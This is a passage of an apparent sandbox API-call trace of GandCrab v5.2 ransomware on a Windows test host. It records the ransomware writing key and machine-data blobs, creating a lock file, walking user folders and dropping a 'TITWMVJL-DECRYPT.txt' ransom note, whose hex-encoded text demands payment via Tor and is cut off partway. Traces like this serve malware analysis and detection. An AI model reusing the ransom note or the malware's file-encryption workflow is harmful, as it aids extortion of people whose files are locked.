x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.333] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0070.333] CloseHandle (hObject=0x2bc) returned 1 [0070.334] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.334] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.334] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x28c)) [0070.334] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.334] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.334] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.334] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned 86 [0070.334] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0070.340] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.340] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.341] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 62 [0070.341] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0070.341] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5034b8 [0070.341] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.341] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.341] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.341] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.341] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.341] lstrcmpW (lpString1="#SharedObjects", lpString2=".") returned -1 [0070.341] lstrcmpW (lpString1="#SharedObjects", lpString2="..") returned -1 [0070.341] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="#SharedObjects" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0070.341] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0070.341] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.342] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.342] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.342] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\TITWMVJL-DECRYPT.txt") returned 98 [0070.343] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0070.343] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\